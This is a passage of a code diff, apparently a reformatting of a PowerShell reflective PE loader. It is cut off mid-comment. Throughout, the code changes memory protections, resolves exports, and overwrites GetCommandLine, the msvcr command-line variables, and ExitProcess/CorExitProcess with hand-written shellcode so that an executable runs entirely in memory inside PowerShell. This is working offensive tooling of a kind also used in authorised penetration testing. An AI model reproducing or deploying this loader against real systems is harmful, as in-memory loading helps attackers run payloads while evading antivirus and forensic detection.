-		if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_NOT_CACHED) -gt 0)
-		{
-			$ProtectionFlag = $ProtectionFlag -bor $Win32Constants.PAGE_NOCACHE
-		}
-		
-		return $ProtectionFlag
-	}
-
-	Function Update-MemoryProtectionFlags
-	{
-		Param(
-		[Parameter(Position = 0, Mandatory = $true)]
-		[System.Object]
-		$PEInfo,
-		
-		[Parameter(Position = 1, Mandatory = $true)]
-		[System.Object]
-		$Win32Functions,
-		
-		[Parameter(Position = 2, Mandatory = $true)]
-		[System.Object]
-		$Win32Constants,
-		
-		[Parameter(Position = 3, Mandatory = $true)]
-		[System.Object]
-		$Win32Types
-		)
-		
-		for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++)
-		{
-			[IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))
-			$SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER)
-			[IntPtr]$SectionPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($SectionHeader.VirtualAddress)
-			
-			[UInt32]$ProtectFlag = Get-VirtualProtectValue $SectionHeader.Characteristics
-			[UInt32]$SectionSize = $SectionHeader.VirtualSize
-			
-			[UInt32]$OldProtectFlag = 0
-			Test-MemoryRangeValid -DebugString "Update-MemoryProtectionFlags::VirtualProtect" -PEInfo $PEInfo -StartAddress $SectionPtr -Size $SectionSize | Out-Null
-			$Success = $Win32Functions.VirtualProtect.Invoke($SectionPtr, $SectionSize, $ProtectFlag, [Ref]$OldProtectFlag)
-			if ($Success -eq $false)
-			{
-				Throw "Unable to change memory protection"
-			}
-		}
-	}
-	
-	#This function overwrites GetCommandLine and ExitThread which are needed to reflectively load an EXE
-	#Returns an object with addresses to copies of the bytes that were overwritten (and the count)
-	Function Update-ExeFunctions
-	{
-		Param(
-		[Parameter(Position = 0, Mandatory = $true)]
-		[System.Object]
-		$PEInfo,
-		
-		[Parameter(Position = 1, Mandatory = $true)]
-		[System.Object]
-		$Win32Functions,
-		
-		[Parameter(Position = 2, Mandatory = $true)]
-		[System.Object]
-		$Win32Constants,
-		
-		[Parameter(Position = 3, Mandatory = $true)]
-		[String]
-		$ExeArguments,
-		
-		[Parameter(Position = 4, Mandatory = $true)]
-		[IntPtr]
-		$ExeDoneBytePtr
-		)
-		
-		#This will be an array of arrays. The inner array will consist of: @($DestAddr, $SourceAddr, $ByteCount). This is used to return memory to its original state.
-		$ReturnArray = @() 
-		
-		$PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
-		[UInt32]$OldProtectFlag = 0
-		
-		[IntPtr]$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("Kernel32.dll")
-		if ($Kernel32Handle -eq [IntPtr]::Zero)
-		{
-			throw "Kernel32 handle null"
-		}
-		
-		[IntPtr]$KernelBaseHandle = $Win32Functions.GetModuleHandle.Invoke("KernelBase.dll")
-		if ($KernelBaseHandle -eq [IntPtr]::Zero)
-		{
-			throw "KernelBase handle null"
-		}
-
-		#################################################
-		#First overwrite the GetCommandLine() function. This is the function that is called by a new process to get the command line args used to start it.
-		#	We overwrite it with shellcode to return a pointer to the string ExeArguments, allowing us to pass the exe any args we want.
-		$CmdLineWArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments)
-		$CmdLineAArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments)
-	
-		[IntPtr]$GetCommandLineAAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, "GetCommandLineA")
-		[IntPtr]$GetCommandLineWAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, "GetCommandLineW")
-
-		if ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero)
-		{
-			throw "GetCommandLine ptr null. GetCommandLineA: $(Get-Hex $GetCommandLineAAddr). GetCommandLineW: $(Get-Hex $GetCommandLineWAddr)"
-		}
-
-		#Prepare the shellcode
-		[Byte[]]$Shellcode1 = @()
-		if ($PtrSize -eq 8)
-		{
-			$Shellcode1 += 0x48	#64bit shellcode has the 0x48 before the 0xb8
-		}
-		$Shellcode1 += 0xb8
-		
-		[Byte[]]$Shellcode2 = @(0xc3)
-		$TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length
-		
-		
-		#Make copy of GetCommandLineA and GetCommandLineW
-		$GetCommandLineAOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)
-		$GetCommandLineWOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)
-		$Win32Functions.memcpy.Invoke($GetCommandLineAOrigBytesPtr, $GetCommandLineAAddr, [UInt64]$TotalSize) | Out-Null
-		$Win32Functions.memcpy.Invoke($GetCommandLineWOrigBytesPtr, $GetCommandLineWAddr, [UInt64]$TotalSize) | Out-Null
-		$ReturnArray += ,($GetCommandLineAAddr, $GetCommandLineAOrigBytesPtr, $TotalSize)
-		$ReturnArray += ,($GetCommandLineWAddr, $GetCommandLineWOrigBytesPtr, $TotalSize)
-
-		#Overwrite GetCommandLineA
-		[UInt32]$OldProtectFlag = 0
-		$Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
-		if ($Success = $false)
-		{
-			throw "Call to VirtualProtect failed"
-		}
-		
-		$GetCommandLineAAddrTemp = $GetCommandLineAAddr
-		Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineAAddrTemp
-		$GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)
-		[System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineAArgsPtr, $GetCommandLineAAddrTemp, $false)
-		$GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp $PtrSize
-		Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineAAddrTemp
-		
-		$Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
-		
-		
-		#Overwrite GetCommandLineW
-		[UInt32]$OldProtectFlag = 0
-		$Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
-		if ($Success = $false)
-		{
-			throw "Call to VirtualProtect failed"
-		}
-		
-		$GetCommandLineWAddrTemp = $GetCommandLineWAddr
-		Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
-		$GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp ($Shellcode1.Length)
-		[System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineWArgsPtr, $GetCommandLineWAddrTemp, $false)
-		$GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp $PtrSize
-		Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineWAddrTemp
-		
-		$Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
-		#################################################
-		
-		
-		#################################################
-		#For C++ stuff that is compiled with visual studio as "multithreaded DLL", the above method of overwriting GetCommandLine doesn't work.
-		#	I don't know why exactly.. But the msvcr DLL that a "DLL compiled executable" imports has an export called _acmdln and _wcmdln.
-		#	It appears to call GetCommandLine and store the result in this var. Then when you call __wgetcmdln it parses and returns the
-		#	argv and argc values stored in these variables. So the easy thing to do is just overwrite the variable since they are exported.
-		$DllList = @("msvcr70d.dll", "msvcr71d.dll", "msvcr80d.dll", "msvcr90d.dll", "msvcr100d.dll", "msvcr110d.dll", "msvcr70.dll" `
-			, "msvcr71.dll", "msvcr80.dll", "msvcr90.dll", "msvcr100.dll", "msvcr110.dll")
-		
-		foreach ($Dll in $DllList)
-		{
-			[IntPtr]$DllHandle = $Win32Functions.GetModuleHandle.Invoke($Dll)
-			if ($DllHandle -ne [IntPtr]::Zero)
-			{
-				[IntPtr]$WCmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, "_wcmdln")
-				[IntPtr]$ACmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, "_acmdln")
-				if ($WCmdLnAddr -eq [IntPtr]::Zero -or $ACmdLnAddr -eq [IntPtr]::Zero)
-				{
-					"Error, couldn't find _wcmdln or _acmdln"
-				}
-				
-				$NewACmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments)
-				$NewWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments)
-				
-				#Make a copy of the original char* and wchar_t* so these variables can be returned back to their original state
-				$OrigACmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ACmdLnAddr, [Type][IntPtr])
-				$OrigWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($WCmdLnAddr, [Type][IntPtr])
-				$OrigACmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
-				$OrigWCmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
-				[System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigACmdLnPtr, $OrigACmdLnPtrStorage, $false)
-				[System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigWCmdLnPtr, $OrigWCmdLnPtrStorage, $false)
-				$ReturnArray += ,($ACmdLnAddr, $OrigACmdLnPtrStorage, $PtrSize)
-				$ReturnArray += ,($WCmdLnAddr, $OrigWCmdLnPtrStorage, $PtrSize)
-				
-				$Success = $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
-				if ($Success = $false)
-				{
-					throw "Call to VirtualProtect failed"
-				}
-				[System.Runtime.InteropServices.Marshal]::StructureToPtr($NewACmdLnPtr, $ACmdLnAddr, $false)
-				$Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null
-				
-				$Success = $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
-				if ($Success = $false)
-				{
-					throw "Call to VirtualProtect failed"
-				}
-				[System.Runtime.InteropServices.Marshal]::StructureToPtr($NewWCmdLnPtr, $WCmdLnAddr, $false)
-				$Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null
-			}
-		}
-		#################################################
-		
-		
-		#################################################
-		#Next overwrite CorExitProcess and ExitProcess to instead ExitThread. This way the entire Powershell process doesn't die when the EXE exits.
-
-		$ReturnArray = @()
-		$ExitFunctions = @() #Array of functions to overwrite so the thread doesn't exit the process
-		
-		#CorExitProcess (compiled in to visual studio c++)
-		[IntPtr]$MscoreeHandle = $Win32Functions.GetModuleHandle.Invoke("mscoree.dll")
-		if ($MscoreeHandle -eq [IntPtr]::Zero)
-		{
-			throw "mscoree handle null"
-		}
-		[IntPtr]$CorExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($MscoreeHandle, "CorExitProcess")
-		if ($CorExitProcessAddr -eq [IntPtr]::Zero)
-		{
-			Throw "CorExitProcess address not found"
-		}
-		$ExitFunctions += $CorExitProcessAddr
-		
-		#ExitProcess (what non-managed programs use)
-		[IntPtr]$ExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "ExitProcess")
-		if ($ExitProcessAddr -eq [IntPtr]::Zero)
-		{
-			Throw "ExitProcess address not found"
-		}
-		$ExitFunctions += $ExitProcessAddr
-		
-		[UInt32]$OldProtectFlag = 0
-		foreach ($ProcExitFunctionAddr in $ExitFunctions)
-		{
-			$ProcExitFunctionAddrTmp = $ProcExitFunctionAddr
-			#The following is the shellcode (Shellcode: ExitThread.asm):
-			#32bit shellcode
-			[Byte[]]$Shellcode1 = @(0xbb)
-			[Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb)
-			#64bit shellcode (Shellcode: ExitThread.asm)
-			if ($PtrSize -eq 8)
-			{
-				[Byte[]]$Shellcode1 = @(0x48, 0xbb)
-				[Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb)
-			}
-			[Byte[]]$Shellcode3 = @(0xff, 0xd3)
-			$TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length + $PtrSize + $Shellcode3.Length
-			
-			[IntPtr]$ExitThreadAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "ExitThread")
-			if ($ExitThreadAddr -eq [IntPtr]::Zero)
-			{
-				Throw "ExitThread address not found"
-			}
-
-			$Success = $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag)
-			if ($Success -eq $false)
-			{
-				Throw "Call to VirtualProtect failed"
-			}
-			
-			#Make copy of original ExitProcess bytes
-			$ExitProcessOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)
-			$Win32Functions.memcpy.Invoke($ExitProcessOrigBytesPtr, $ProcExitFunctionAddr, [UInt64]$TotalSize) | Out-Null
-			$ReturnArray += ,($ProcExitFunctionAddr, $ExitProcessOrigBytesPtr, $TotalSize)
-			
-			#Write the ExitThread shellcode to memory. This shellcode will write 0x01 to ExeDoneBytePtr address (so PS knows the EXE is done), then 
-			#	call ExitThread
-			Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $ProcExitFunctionAddrTmp
-			$ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode1.Length)
-			[System.Runtime.InteropServices.Marshal]::StructureToPtr($ExeDoneBytePtr, $ProcExitFunctionAddrTmp, $false)
-			$ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize
-			Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $ProcExitFunctionAddrTmp
-			$ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode2.Length)
-			[System.Runtime.InteropServices.Marshal]::StructureToPtr($ExitThreadAddr, $ProcExitFunctionAddrTmp, $false)
-			$ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize
-			Write-BytesToMemory -Bytes $Shellcode3 -MemoryAddress $ProcExitFunctionAddrTmp
-
-			$Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
-		}
-		#################################################
-
-		Write-Output $ReturnArray
-	}
-	
-	
-	#This function takes an array of arrays, the inner array of format @($DestAddr, $SourceAddr, $Count)
-	#	It copies Count bytes from Source to Destination.
-	Function Copy-ArrayOfMemAddresses
-	{
-		Param(
-		[Parameter(Position = 0, Mandatory = $true)]
-		[Array[]]
-		$CopyInfo,
-		
-		[Parameter(Position = 1, Mandatory = $true)]
-		[System.Object]
-		$Win32Functions,
-		
-		[Parameter(Position = 2, Mandatory = $true)]
-		[System.Object]
-		$Win32Constants
-		)
-
-		[UInt32]$OldProtectFlag = 0
-		foreach ($Info in $CopyInfo)
-		{
-			$Success = $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag)
-			if ($Success -eq $false)
-			{
-				Throw "Call to VirtualProtect failed"
-			}
-			
-			$Win32Functions.memcpy.Invoke($Info[0], $Info[1], [UInt64]$Info[2]) | Out-Null
-			
-			$Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
-		}
-	}
-
-
-	#####################################
-	##########    FUNCTIONS   ###########
-	#####################################
-	Function Get-MemoryProcAddress
-	{
-		Param(
-		[Parameter(Position = 0, Mandatory = $true)]
-		[IntPtr]
-		$PEHandle,
-		
-		[Parameter(Position = 1, Mandatory = $true)]
-		[String]
-		$FunctionName
-		)
-		
-		$Win32Types = Get-Win32Types
-		$Win32Constants = Get-Win32Constants
-		$PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
-		
-		#Get the export table
-		if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.Size -eq 0)
-		{
-			return [IntPtr]::Zero
-		}
-		$ExportTablePtr = Add-SignedIntAsUnsigned ($PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.VirtualAddress)
-		$ExportTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ExportTablePtr, [Type]$Win32Types.IMAGE_EXPORT_DIRECTORY)
-		
-		for ($i = 0; $i -lt $ExportTable.NumberOfNames; $i++)
-		{
-			#AddressOfNames is an array of pointers to strings of the names of the functions exported
-			$NameOffsetPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNames + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))
-			$NamePtr = Add-SignedIntAsUnsigned ($PEHandle) ([System.Runtime.InteropServices.Marshal]::PtrToStructure($NameOffsetPtr, [Type][UInt32]))
-			$Name = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($NamePtr)
-
-			if ($Name -ceq $FunctionName)
-			{
-				#AddressOfNameOrdinals is a table which contains points to a WORD which is the index in to AddressOfFunctions
-				#    which contains the offset of the function in to the DLL
-				$OrdinalPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNameOrdinals + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16])))
-				$FuncIndex = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OrdinalPtr, [Type][UInt16])
-				$FuncOffsetAddr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfFunctions + ($FuncIndex * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))
-				$FuncOffset = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FuncOffsetAddr, [Type][UInt32])
-				return Add-SignedIntAsUnsigned ($PEHandle) ($FuncOffset)
-			}
-		}
-		
-		return [IntPtr]::Zero
-	}
-
-
-	Function Invoke-MemoryLoadLibrary
-	{
-		Param(
-		[Parameter( Position = 0, Mandatory = $true )]
-		[Byte[]]
-		$PEBytes,
-		
-		[Parameter(Position = 1, Mandatory = $false)]
-		[String]
-		$ExeArgs,
-		
-		[Parameter(Position = 2, Mandatory = $false)]
-		[IntPtr]
-		$RemoteProcHandle,
+                }
+
+                $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))
+            }
+        }
+    }
+
+    Function Get-VirtualProtectValue
+    {
+        Param(
+        [Parameter(Position = 0, Mandatory = $true)]
+        [UInt32]
+        $SectionCharacteristics
+        )
+
+        $ProtectionFlag = 0x0
+        if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_EXECUTE) -gt 0)
+        {
+            if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)
+            {
+                if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
+                {
+                    $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READWRITE
+                }
+                else
+                {
+                    $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READ
+                }
+            }
+            else
+            {
+                if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
+                {
+                    $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_WRITECOPY
+                }
+                else
+                {
+                    $ProtectionFlag = $Win32Constants.PAGE_EXECUTE
+                }
+            }
+        }
+        else
+        {
+            if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)
+            {
+                if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
+                {
+                    $ProtectionFlag = $Win32Constants.PAGE_READWRITE
+                }
+                else
+                {
+                    $ProtectionFlag = $Win32Constants.PAGE_READONLY
+                }
+            }
+            else
+            {
+                if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)
+                {
+                    $ProtectionFlag = $Win32Constants.PAGE_WRITECOPY
+                }
+                else
+                {
+                    $ProtectionFlag = $Win32Constants.PAGE_NOACCESS
+                }
+            }
+        }
+
+        if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_NOT_CACHED) -gt 0)
+        {
+            $ProtectionFlag = $ProtectionFlag -bor $Win32Constants.PAGE_NOCACHE
+        }
+
+        return $ProtectionFlag
+    }
+
+    Function Update-MemoryProtectionFlags
+    {
+        Param(
+        [Parameter(Position = 0, Mandatory = $true)]
+        [System.Object]
+        $PEInfo,
+
+        [Parameter(Position = 1, Mandatory = $true)]
+        [System.Object]
+        $Win32Functions,
+
+        [Parameter(Position = 2, Mandatory = $true)]
+        [System.Object]
+        $Win32Constants,
+
+        [Parameter(Position = 3, Mandatory = $true)]
+        [System.Object]
+        $Win32Types
+        )
+
+        for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++)
+        {
+            [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))
+            $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER)
+            [IntPtr]$SectionPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($SectionHeader.VirtualAddress)
+
+            [UInt32]$ProtectFlag = Get-VirtualProtectValue $SectionHeader.Characteristics
+            [UInt32]$SectionSize = $SectionHeader.VirtualSize
+
+            [UInt32]$OldProtectFlag = 0
+            Test-MemoryRangeValid -DebugString "Update-MemoryProtectionFlags::VirtualProtect" -PEInfo $PEInfo -StartAddress $SectionPtr -Size $SectionSize | Out-Null
+            $Success = $Win32Functions.VirtualProtect.Invoke($SectionPtr, $SectionSize, $ProtectFlag, [Ref]$OldProtectFlag)
+            if ($Success -eq $false)
+            {
+                Throw "Unable to change memory protection"
+            }
+        }
+    }
+
+    #This function overwrites GetCommandLine and ExitThread which are needed to reflectively load an EXE
+    #Returns an object with addresses to copies of the bytes that were overwritten (and the count)
+    Function Update-ExeFunctions
+    {
+        Param(
+        [Parameter(Position = 0, Mandatory = $true)]
+        [System.Object]
+        $PEInfo,
+
+        [Parameter(Position = 1, Mandatory = $true)]
+        [System.Object]
+        $Win32Functions,
+
+        [Parameter(Position = 2, Mandatory = $true)]
+        [System.Object]
+        $Win32Constants,
+
+        [Parameter(Position = 3, Mandatory = $true)]
+        [String]
+        $ExeArguments,
+
+        [Parameter(Position = 4, Mandatory = $true)]
+        [IntPtr]
+        $ExeDoneBytePtr
+        )
+
+        #This will be an array of arrays. The inner array will consist of: @($DestAddr, $SourceAddr, $ByteCount). This is used to return memory to its original state.
+        $ReturnArray = @()
+
+        $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
+        [UInt32]$OldProtectFlag = 0
+
+        [IntPtr]$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("Kernel32.dll")
+        if ($Kernel32Handle -eq [IntPtr]::Zero)
+        {
+            throw "Kernel32 handle null"
+        }
+
+        [IntPtr]$KernelBaseHandle = $Win32Functions.GetModuleHandle.Invoke("KernelBase.dll")
+        if ($KernelBaseHandle -eq [IntPtr]::Zero)
+        {
+            throw "KernelBase handle null"
+        }
+
+        #################################################
+        #First overwrite the GetCommandLine() function. This is the function that is called by a new process to get the command line args used to start it.
+        #   We overwrite it with shellcode to return a pointer to the string ExeArguments, allowing us to pass the exe any args we want.
+        $CmdLineWArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments)
+        $CmdLineAArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments)
+
+        [IntPtr]$GetCommandLineAAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, "GetCommandLineA")
+        [IntPtr]$GetCommandLineWAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, "GetCommandLineW")
+
+        if ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero)
+        {
+            throw "GetCommandLine ptr null. GetCommandLineA: $(Get-Hex $GetCommandLineAAddr). GetCommandLineW: $(Get-Hex $GetCommandLineWAddr)"
+        }
+
+        #Prepare the shellcode
+        [Byte[]]$Shellcode1 = @()
+        if ($PtrSize -eq 8)
+        {
+            $Shellcode1 += 0x48 #64bit shellcode has the 0x48 before the 0xb8
+        }
+        $Shellcode1 += 0xb8
+
+        [Byte[]]$Shellcode2 = @(0xc3)
+        $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length
+
+        #Make copy of GetCommandLineA and GetCommandLineW
+        $GetCommandLineAOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)
+        $GetCommandLineWOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)
+        $Win32Functions.memcpy.Invoke($GetCommandLineAOrigBytesPtr, $GetCommandLineAAddr, [UInt64]$TotalSize) | Out-Null
+        $Win32Functions.memcpy.Invoke($GetCommandLineWOrigBytesPtr, $GetCommandLineWAddr, [UInt64]$TotalSize) | Out-Null
+        $ReturnArray += ,($GetCommandLineAAddr, $GetCommandLineAOrigBytesPtr, $TotalSize)
+        $ReturnArray += ,($GetCommandLineWAddr, $GetCommandLineWOrigBytesPtr, $TotalSize)
+
+        #Overwrite GetCommandLineA
+        [UInt32]$OldProtectFlag = 0
+        $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
+        if ($Success = $false)
+        {
+            throw "Call to VirtualProtect failed"
+        }
+
+        $GetCommandLineAAddrTemp = $GetCommandLineAAddr
+        Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineAAddrTemp
+        $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)
+        [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineAArgsPtr, $GetCommandLineAAddrTemp, $false)
+        $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp $PtrSize
+        Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineAAddrTemp
+
+        $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
+
+
+        #Overwrite GetCommandLineW
+        [UInt32]$OldProtectFlag = 0
+        $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
+        if ($Success = $false)
+        {
+            throw "Call to VirtualProtect failed"
+        }
+
+        $GetCommandLineWAddrTemp = $GetCommandLineWAddr
+        Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
+        $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp ($Shellcode1.Length)
+        [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineWArgsPtr, $GetCommandLineWAddrTemp, $false)
+        $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp $PtrSize
+        Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineWAddrTemp
+
+        $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
+        #################################################
+
+        #################################################
+        #For C++ stuff that is compiled with visual studio as "multithreaded DLL", the above method of overwriting GetCommandLine doesn't work.
+        #   I don't know why exactly.. But the msvcr DLL that a "DLL compiled executable" imports has an export called _acmdln and _wcmdln.
+        #   It appears to call GetCommandLine and store the result in this var. Then when you call __wgetcmdln it parses and returns the
